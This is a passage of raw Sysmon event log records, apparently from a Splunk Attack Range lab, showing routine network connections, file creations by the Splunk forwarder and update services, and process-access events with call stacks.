Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBF8148319BC6C1BC614D27BAD3E89F7,SHA256=0F02FA9DDBCB2CD32504817067665DDA608E958945B6317C175769D387291A8C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:56.268{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de65352-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000981516Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:59.706{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB3EFA3CC945182E57D12E4B27611DCB,SHA256=24B750D7E3C22E2F79869BA0E2758D17F5DFBFC56A31D14B9BDA37351E82308A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:57.999{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54254-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:59.790{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53460C0524DC9ABD9938493A8C7843ED,SHA256=9BCCED0150B2C20B9FF5E6973E9089895ABB48933B2B98BECC0F5FFA80051DA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:57.181{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58702-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000981515Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:55.559{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51826-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981518Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:00.706{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3A06A5D7187F2F3749362F54D852092,SHA256=1E528ACB7005D7E13A69981C4D87FE1B1AB36BCD13A9E8DFA2FEDDEBBEBCB44E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:00.805{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E61A66F1C2F2056283B8728D621B86D,SHA256=EC489461BDA4F251D71F973A14C60DF0F3112302B8A4C85F244B54D02C57A8B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981517Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:56.797{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59554-false10.0.1.12-8000- 23542300x80000000000000001056997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:00.587{5EBD8912-8CC0-6151-1100-00000000FD01}412NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=3A4EF5756D35B4D80D2B698047F83218,SHA256=934B0D6ECD4ADAA5117BC9AE8A794CE776F188B440980F413E24C4D9E91749E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.977{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.977{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.977{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001057025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.977{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.977{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.977{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.977{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.977{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.977{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.962{5EBD8912-8CC0-6151-1600-00000000FD01}1296NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF526d9.TMPMD5=7692FECA7F1F38026285306391FE6452,SHA256=802EE866128216E4204D1FE07B521F997CC54B86A8966B0B4EEC00E36BB1428D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.915{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.915{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.915{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.915{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.915{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.915{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.869{5EBD8912-8CC0-6151-1600-00000000FD01}12961772C:\Windows\system32\svchost.exe{5EBD8912-8DED-6151-BF00-00000000FD01}5208C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+210d2|c:\windows\system32\usocore.dll+15924|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001057011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.821{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3F9B7033AC7EBCA2A67AE698EA78808,SHA256=0358C6E6A59776AD783A63C3B27667CE7B0610D00877E780A2E62E4A5334B15E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981519Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:01.722{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E05868121CBF1C202FAEADFBD247884F,SHA256=6DEBE621C7CDF445F0390A7BD544E67E9B7D37CD530D49CD643452CA12CCA6B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.712{5EBD8912-8CC0-6151-1600-00000000FD01}1296NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.100.etlMD5=947C0D7A21B0A54CA33FF7D5F33B37DB,SHA256=2E434CA6DA828E3F8746DDAF311D8FC140DB14C549CBC9822FFB56900AA12496,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.680{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8DED-6151-BF00-00000000FD01}5208C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:01.649{5EBD8912-8DED-6151-C000-00000000FD01}51004276C:\Windows\system32\conhost.exe{5EBD8912-8DED-6151-BF00-00000000FD01}5208C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 